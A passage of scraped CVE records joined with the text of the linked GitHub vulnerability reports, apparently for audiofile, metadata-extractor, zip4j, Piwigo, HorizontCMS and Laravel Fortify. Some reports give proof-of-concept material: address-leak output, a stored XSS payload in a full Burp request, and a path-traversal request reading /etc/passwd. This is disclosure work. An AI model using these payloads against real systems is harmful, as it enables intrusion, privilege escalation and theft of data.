"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WTETOUJNRR75REYJZTBGF6TAJZYTMXUY/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YZPG27YKICLIWUFOPVUOAFAZGOX4BNHY/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:audio_file_library_project:audio_file_library:0.3.6:*:*:*:*:*:*:*", "matchCriteriaId": "47CD841B-F23D-41F5-B31D-51A7B377BA75", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:37:*:*:*:*:*:*:*", "matchCriteriaId": "E30D0E6F-4AE8-4284-8716-991DFA48CC5D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:38:*:*:*:*:*:*:*", "matchCriteriaId": "CC559B26-5DFC-4B7A-A27C-B77DE755DFF9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:39:*:*:*:*:*:*:*", "matchCriteriaId": "B8EDB836-4E6A-4B71-B9B2-AA3E03E0F646", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "401" ]
401
https://github.com/mpruett/audiofile/issues/60
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "mpruett", "audiofile" ]
There exists one Memory-leak bug in printfileinfo, in printinfo.c, which allows an attacker to leak the address of heap or libc via a crafted file. To reproduce with the attached poc file: [poc.zip](https://github.com/mpruett/audiofile/files/7986695/poc.zip) Heap address leak: ./sfinfo ./heapleak_poc.aiff Result(See the output of Copyright): ``` $ ./sfinfo ./heapleak_poc.aiff File Name ./heapleak_poc.aiff File Format Audio Interchange File Format (aiff) Data Format unknown Audio Data 0 bytes begins at offset 0 (0 hex) 0 channel, -1 frames Sampling Rate 0.00 Hz Duration -inf seconds Copyright C��U ``` Libc address leak: ./sfinfo ./libleak_poc.aiff Result(See the output of Copyright): ``` $ ./sfinfo ./libleak_poc.aiff File Name ./libleak_poc.aiff File Format Audio Interchange File Format (aiff) Data Format unknown Audio Data 0 bytes begins at offset 0 (0 hex) 0 channel, -1 frames Sampling Rate 0.00 Hz Duration -inf seconds Copyright Copyright 1991, (d��i ``` **This vulnerability can be triggered anywhere the printfileinfo function is called, for example, sfconvert.** **The poc.py will help you to calculate the address, which is test on Ubuntu 20.04, python2.** Usage of poc.py: ``` $ python2 poc.py heap [+] Starting local process './sfinfo': pid 17868 [*] Process './sfinfo' stopped with exit code 0 (pid 17868) [+] heap_leak:0x55b2425d4243 [+] heap_base:0x55b2425c2000 $ python2 poc.py lib [+] Starting local process './sfinfo': pid 17920 [*] Process './sfinfo' stopped with exit code 0 (pid 17920) [+] lib_leak:0x7f3d0cbf5428 [+] libaudiofile_base:0x7f3d0cbc9000 [+] libc_base:0x7f3d0c9bf000 ``` The audiofile project is built with: ``` $ ./autogen.sh --disable-docs --prefix=OUTPUT_DIR $ make $ make install ``` ### Descrtption of the Vulnerability: **First**, the printfileinfo function calls the copyrightstring function to get data: ``` //printfileinfo function, printinfo.c bool printfileinfo (const char *filename){ ... char *copyright = copyrightstring(file); if (copyright) { printf("Copyright %s\n", copyright); free(copyright); } ... } ``` **Second**, the copyrightstring function obtains copyright information from the file and returns a string pointer: ``` //copyrightstring function, printinfo.c static char *copyrightstring (AFfilehandle file){ ... int datasize = afGetMiscSize(file, miscids[i]); char *data = (char *) malloc(datasize); afReadMisc(file, miscids[i], data, datasize); copyright = data; break; ... } ``` **However, it forgets to use memset or zero bytes to prevent the Memory-Leak Vulnerability. Most importantly, the attacker can control the length of the memcpy when copying the copyright string, in the afReadMisc function, in Miscellaneous.cpp:** ``` //afWriteMisc function, Miscellaneous.cpp int afWriteMisc (AFfilehandle file, int miscellaneousid, const void *buf, int bytes) { ... int localsize = std::min(bytes, miscellaneous->size - miscellaneous->position); memcpy((char *) miscellaneous->buffer + miscellaneous->position, buf, localsize); miscellaneous->position += localsize; return localsize; ... } ```
Memory-leak bug in printfileinfo, in printinfo.c
https://api.github.com/repos/mpruett/audiofile/issues/60/comments
2
2022-02-02T13:25:06Z
2023-11-11T17:05:02Z
https://github.com/mpruett/audiofile/issues/60
1,121,923,970
60
3,232
CVE-2022-24613
2022-02-24T15:15:29.713
metadata-extractor up to 2.16.0 can throw various uncaught exceptions while parsing a specially crafted JPEG file, which could result in an application crash. This could be used to mount a denial of service attack against services that use metadata-extractor library.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/drewnoakes/metadata-extractor/issues/561" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/drewnoakes/metadata-extractor/issues/561" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:metadata-extractor_project:metadata-extractor:*:*:*:*:*:*:*:*", "matchCriteriaId": "61E89144-6999-46A1-B104-A545FBFF049B", "versionEndExcluding": "2.16.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "755" ]
755
https://github.com/drewnoakes/metadata-extractor/issues/561
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "drewnoakes", "metadata-extractor" ]
## 1. Unique Bugs Found Recently we ([Zhang Cen](https://github.com/occia), [Huang Wenjie](https://github.com/ZanderHuang) and [Zhang Xiaohan](https://github.com/Han0nly)) discovered a series of bugs in latest metadta-extractor (2.16.0). Every bug we reported in the following is unique and reproducable. We sorted and refined them from thousands of crashes. Furthermore, they have been manually analyzed and triaged in removing the duplicates. <br />Due to the lack of contextual knowledge in the metadta-extractor library, we cannot thoroughly fix some bugs hence we look forward to any proposed plan from the developers in fixing these bugs. ## 2. Bug Report and Crash Seeds The bug report folder can be downloaded from https://drive.google.com/drive/folders/17UpSofkqh1KV1L5yGWzRFOT37LAJgliM?usp=sharing It contains both reports and crash seeds. ## 3. Test Program to Reproduce Crashes The test program can be downloaded from https://drive.google.com/file/d/1TfMaxAUyjuQIwXfQzHT-xUN7f25piqWt/view?usp=sharing Total 33 bugs are reported in this pull request. A full list is provided below. ### 4. Folder Structure - Level 1 (folder): exception type - Level 2 (folder): error location - Level 3 (files): POC file and **report.txt** including reproducing steps ### 5. report.txt content: 1. Exception type 2. Error location 3. Bug cause and impact 4. Crash thread's stacks 5. Steps to reproduce ### 6. Bug Full List metadata-extractor_reported_crashes ├── java.lang.ArithmeticException │   └── com.drew.metadata.exif.PanasonicRawDistortionDescriptor.getDistortionScaleDescription--PanasonicRawDistortionDescriptor.java-97 ├── java.lang.ArrayIndexOutOfBoundsException │   ├── com.drew.metadata.exif.ExifDescriptorBase.formatCFAPattern--ExifDescriptorBase.java-586 │   └── com.drew.metadata.mp3.Mp3Reader.extract--Mp3Reader.java-96 ├── java.lang.IllegalArgumentException │   ├── com.drew.lang.StreamReader.skip--StreamReader.java-95 │   ├── com.drew.metadata.mov.atoms.FileTypeCompatibilityAtom.<init>--FileTypeCompatibilityAtom.java-46 │   ├── com.drew.metadata.mov.atoms.SampleDescriptionAtom.<init>--SampleDescriptionAtom.java-44 │   └── com.drew.metadata.mov.atoms.TimeToSampleAtom.<init>--TimeToSampleAtom.java-44 ├── java.lang.IndexOutOfBoundsException │   ├── com.drew.metadata.mov.atoms.SoundSampleDescriptionAtom.addMetadata--SoundSampleDescriptionAtom.java-49 │   ├── com.drew.metadata.mov.atoms.SubtitleSampleDescriptionAtom.addMetadata--SubtitleSampleDescriptionAtom.java-75 │   ├── com.drew.metadata.mov.atoms.TextSampleDescriptionAtom.addMetadata--TextSampleDescriptionAtom.java-48 │   ├── com.drew.metadata.mov.atoms.TimecodeSampleDescriptionAtom.addMetadata--TimecodeSampleDescriptionAtom.java-48 │   ├── com.drew.metadata.mov.atoms.TimeToSampleAtom.addMetadata--TimeToSampleAtom.java-64 │   ├── com.drew.metadata.mov.atoms.VideoSampleDescriptionAtom.addMetadata--VideoSampleDescriptionAtom.java-49 │   └── com.drew.metadata.mov.metadata.QuickTimeDataHandler.processData--QuickTimeDataHandler.java-105 ├── java.lang.NegativeArraySizeException │   ├── com.drew.lang.SequentialByteArrayReader.getBytes--SequentialByteArrayReader.java-77 │   ├── com.drew.lang.SequentialReader.getNullTerminatedBytes--SequentialReader.java-374 │   └── com.drew.lang.StreamReader.getBytes--StreamReader.java-71 ├── java.lang.NullPointerException │   ├── com.drew.imaging.quicktime.QuickTimeHandler.addError--QuickTimeHandler.java-63 │   ├── com.drew.metadata.Directory.setString--Directory.java-287 │   ├── com.drew.metadata.Metadata.getFirstDirectoryOfType--Metadata.java-101 │   ├── com.drew.metadata.mov.atoms.SubtitleSampleDescriptionAtom.addMetadata--SubtitleSampleDescriptionAtom.java-77 │   ├── com.drew.metadata.mov.atoms.TimeToSampleAtom.addMetadata--TimeToSampleAtom.java-64 │   ├── com.drew.metadata.mov.media.QuickTimeSoundHandler.processTimeToSample--QuickTimeSoundHandler.java-73 │   ├── com.drew.metadata.mov.metadata.QuickTimeDirectoryHandler.processData--QuickTimeDirectoryHandler.java-88 │   ├── com.drew.metadata.mov.QuickTimeMediaHandler.<init>--QuickTimeMediaHandler.java-48 │   ├── com.drew.metadata.mp4.boxes.TimeToSampleBox.addMetadata--TimeToSampleBox.java-58 │   └── com.drew.metadata.mp4.boxes.TimeToSampleBox.addMetadata--TimeToSampleBox.java-65 ├── java.lang.OutOfMemoryError │   ├── com.drew.lang.SequentialByteArrayReader.getBytes--SequentialByteArrayReader.java-77 │   ├── com.drew.lang.SequentialReader.getNullTerminatedBytes--SequentialReader.java-374 │   └── com.drew.lang.StreamReader.getBytes--StreamReader.java-71 └── java.lang.StringIndexOutOfBoundsException ├── com.drew.metadata.exif.ExifTiffHandler.processPrintIM--ExifTiffHandler.java-733 ├── com.drew.metadata.icc.IccDescriptor.getTagDataString--IccDescriptor.java-196 └── com.drew.metadata.icc.IccDescriptor.getTagDataString--IccDescriptor.java-94 Any further discussion for these vulnerabilities including fix is welcomed and look forward to hearing from you. Feel free to contact me at wenjiezander@gmail.com
A list of bugs found (33 bugs in total)
https://api.github.com/repos/drewnoakes/metadata-extractor/issues/561/comments
16
2021-12-10T19:26:48Z
2022-05-05T11:46:07Z
https://github.com/drewnoakes/metadata-extractor/issues/561
1,077,162,492
561
3,233
CVE-2022-24615
2022-02-24T15:15:29.790
zip4j up to v2.10.0 can throw various uncaught exceptions while parsing a specially crafted ZIP file, which could result in an application crash. This could be used to mount a denial of service attack against services that use zip4j library.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/srikanth-lingala/zip4j/issues/377" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/srikanth-lingala/zip4j/issues/418" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/srikanth-lingala/zip4j/issues/377" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/srikanth-lingala/zip4j/issues/418" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:zip4j_project:zip4j:*:*:*:*:*:*:*:*", "matchCriteriaId": "F277A8CA-DAFC-4465-BC83-4FC04FE63425", "versionEndExcluding": "2.10.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "755" ]
755
https://github.com/srikanth-lingala/zip4j/issues/377
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "srikanth-lingala", "zip4j" ]
Recently we ([Zhang Cen](https://github.com/occia) , [Huang Wenjie](https://github.com/ZanderHuang) and [Zhang Xiaohan](https://github.com/Han0nly)) found and submitted several bugs of latest zip4j (2.9.0). For your convenience, here lists the bug summary for all reported bugs (will keep it updated). Note that each issue is a unique bug (we sorted and refined them from thousands of crashes) Any discussion about the bugs are welcome. - https://github.com/srikanth-lingala/zip4j/issues/366 - https://github.com/srikanth-lingala/zip4j/issues/367 - https://github.com/srikanth-lingala/zip4j/issues/368 - https://github.com/srikanth-lingala/zip4j/issues/369 - https://github.com/srikanth-lingala/zip4j/issues/370 - https://github.com/srikanth-lingala/zip4j/issues/371 - https://github.com/srikanth-lingala/zip4j/issues/372 - https://github.com/srikanth-lingala/zip4j/issues/373 - https://github.com/srikanth-lingala/zip4j/issues/374 - https://github.com/srikanth-lingala/zip4j/issues/375 - https://github.com/srikanth-lingala/zip4j/issues/376
Collection of Recent Reported Bugs for zip4j (2.9.0)
https://api.github.com/repos/srikanth-lingala/zip4j/issues/377/comments
23
2021-10-24T15:43:05Z
2022-03-30T05:26:45Z
https://github.com/srikanth-lingala/zip4j/issues/377
1,034,447,276
377
3,234
CVE-2022-24615
2022-02-24T15:15:29.790
zip4j up to v2.10.0 can throw various uncaught exceptions while parsing a specially crafted ZIP file, which could result in an application crash. This could be used to mount a denial of service attack against services that use zip4j library.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/srikanth-lingala/zip4j/issues/377" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/srikanth-lingala/zip4j/issues/418" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/srikanth-lingala/zip4j/issues/377" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/srikanth-lingala/zip4j/issues/418" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:zip4j_project:zip4j:*:*:*:*:*:*:*:*", "matchCriteriaId": "F277A8CA-DAFC-4465-BC83-4FC04FE63425", "versionEndExcluding": "2.10.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "755" ]
755
https://github.com/srikanth-lingala/zip4j/issues/418
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "srikanth-lingala", "zip4j" ]
According to the NVD description of [CVE-2022-24615](https://nvd.nist.gov/vuln/detail/CVE-2022-24615), CVE-2022-24615 affects up to v2.9.0 (excluded). Actually, v2.9.0 and v2.9.1 are also affected by CVE-2022-24615. Don't the versions affected by nvd-CVE-2022-24615 need to be modified?
Does CVE-2022-24615 affect versions v2.9.0 and v2.9.1?
https://api.github.com/repos/srikanth-lingala/zip4j/issues/418/comments
5
2022-03-31T09:40:41Z
2023-12-01T13:02:13Z
https://github.com/srikanth-lingala/zip4j/issues/418
1,187,800,949
418
3,235
CVE-2022-24620
2022-02-24T15:15:29.830
Piwigo version 12.2.0 is vulnerable to stored cross-site scripting (XSS), which can lead to privilege escalation. In this way, admin can steal webmaster's cookies to get the webmaster's access.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Piwigo/Piwigo/issues/1605" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Piwigo/Piwigo/issues/1605" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:piwigo:piwigo:12.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "81C2A86F-D640-455A-915C-B187ECB741AC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/Piwigo/Piwigo/issues/1605
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Piwigo", "Piwigo" ]
Hi, I found Stored XSS in Piwigo version 12.2.0 (Not tested older versions). **Proof Of Concept**: 1. Add an admin through webmaster's access. 2. Through the admin account open http://localhost/piwigo-12.2.0/piwigo/admin.php?page=cat_list 3. Add < svg onload=alert(1)> (Remove space) in the group name field. Can use any malicious JS code, Now you can see XSS will pop-up. **Impact:** In this way admin can easily takeover webmaster's access using [this technique](https://github.com/R0B1NL1N/WebHacking101/blob/master/xss-reflected-steal-cookie.md). **Burp:** ``` POST http://localhost/piwigo-12.2.0/piwigo/admin.php?page=cat_list Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9,hi;q=0.8 Cache-Control: max-age=0 Connection: keep-alive Content-Length: 98 Content-Type: application/x-www-form-urlencoded Cookie: pwg_id=lq5gpi2eacbfhhp9ckm0i60ee0; pwg_album_manager_view=tile; pwg_user_manager_view=line; PHPSESSID=hjg1fi2funadnubkkvb7381ede Host: localhost Origin: http://localhost Referer: http://localhost/piwigo-12.2.0/piwigo/admin.php?page=cat_list sec-ch-ua: " Not;A Brand";v="99", "Google Chrome";v="97", "Chromium";v="97" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36 pwg_token=4feeb12539296772205ca90e39d382aa&virtual_name=%3Csvg+onload%3Dalert%281%29%3E&submitAdd= ``` ![Screenshot - 2_3_2022 , 12_42_32 AM](https://user-images.githubusercontent.com/18497191/152221531-dc8c660a-e2f6-45ec-bba5-2bfa6c8b1a65.png) Please fix the vulnerability & let me know :). Thank You! - [Chirag Artani](https://3rag.com/chirag-artani)
Piwigo-12.2.0 Vulnerable For Stored XSS Which Is Leading To Privilege Escalation
https://api.github.com/repos/Piwigo/Piwigo/issues/1605/comments
3
2022-02-02T19:14:54Z
2022-07-05T16:00:16Z
https://github.com/Piwigo/Piwigo/issues/1605
1,122,294,432
1,605
3,236
CVE-2022-25104
2022-02-24T15:15:30.793
HorizontCMS v1.0.0-beta.2 was discovered to contain an arbitrary file download vulnerability via the component /admin/file-manager/.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ttimot24/HorizontCMS/issues/43" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ttimot24/HorizontCMS/issues/43" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:horizontcms_project:horizontcms:1.0.0:beta2:*:*:*:*:*:*", "matchCriteriaId": "9840814D-4A55-468B-8F55-EEEE82D7EA29", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "552" ]
552
https://github.com/ttimot24/HorizontCMS/issues/43
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "ttimot24", "HorizontCMS" ]
Version:HorizontCMS v1.0.0-beta-2 Submit date: 2022-02-13 Description:Arbitrary file download vulnerability ![image](https://user-images.githubusercontent.com/72428049/153753045-cec9352b-9a0c-4a66-a899-683a58714833.png) POC: ``` GET /admin/file-manager/download?file=storage/images/header_images/../../../../../../../../etc/passwd HTTP/1.1 ``` ![image](https://user-images.githubusercontent.com/72428049/153752902-add8553a-e033-48bb-bb94-46e9cbd5394f.png)
Arbitrary file download vulnerability
https://api.github.com/repos/ttimot24/HorizontCMS/issues/43/comments
0
2022-02-13T12:28:51Z
2022-02-22T22:25:56Z
https://github.com/ttimot24/HorizontCMS/issues/43
1,135,773,425
43
3,237
CVE-2022-25838
2022-02-24T15:15:33.120
Laravel Fortify before 1.11.1 allows reuse within a short time window, thus calling into question the "OT" part of the "TOTP" concept.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/laravel/fortify/issues/201#issuecomment-1009282153" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/laravel/fortify/issues/201#issuecomment-1009282153" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:laravel:fortify:*:*:*:*:*:*:*:*", "matchCriteriaId": "302E12CE-FD88-4D66-A407-616ED2185CA7", "versionEndExcluding": "1.11.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "294" ]
294
https://github.com/laravel/fortify/issues/201#issuecomment-1009282153
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "laravel", "fortify" ]
- Version: v1.7.4 - Laravel Version: v8.22.1 - PHP Version: v7.4.13 ### Description: The current two factor authentication solution sets 2fa to enabled without requiring a confirmation (via TOTP) that the authenticator app is actually set up. ### Steps To Reproduce: The current solution works like this: 1. `POST /user/two-factor-authentication`, the user's `two_factor_secret` is stored. (2fa is now enabled!) 2. `GET /user/two-factor-qr-code`, show QR code and ask user to scan the code with their app. 3. `GET /user/two-factor-recovery-codes`, show recovery codes and ask the user to save them. 4. User abandons the process before setting up their authenticator app or saving the recovery codes and is now **locked out of their account**. They could abandon the process because they first need to choose one of the many TOTP generators in the app store, and get side tracked, or their session times out, or they click the back button, or close their tab, or their computer crashes, ... Definitely 2fa must not be enabled before it is confirmed by a generated OTP. ### How To Fix It: 1. `GET /user/two-factor-qr-code` generates a QR code from a new two factor secret that is **stored in the session**. 2. `GET 